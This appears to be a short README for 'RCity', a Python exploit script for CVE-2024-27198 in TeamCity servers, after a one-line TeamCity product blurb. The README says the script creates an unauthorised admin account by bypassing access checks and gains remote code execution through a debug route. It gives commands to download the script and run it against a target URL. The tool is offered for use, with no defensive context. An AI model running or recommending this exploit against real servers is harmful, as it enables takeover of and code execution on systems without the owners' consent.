TeamCity will help you build faster, and organize development in the most efficient way. CI/CD with real-time reporting, smart analysis
RCity is a Python script that interacts with a vulnerable TeamCity server. The CVE facilitates for unauthorised admin account creation, bypassing 403's on the domain. Whilst also achieving RCE, through the Debug/Processes route.
wget <https://raw.githubusercontent.com/Stuub/RCity-CVE-2024-27198/main/RCity.py>; chmod +x RCity.py
To use the script, you need to provide the target TeamCity server URL as a command-line argument with the -t argument:
python RCity.py -t <http://teamcity.com:8111>
You can increase output verbosity with the -v
or --verbose
option:
python RCity.py -t <http://teamcity.com:8111> --verbose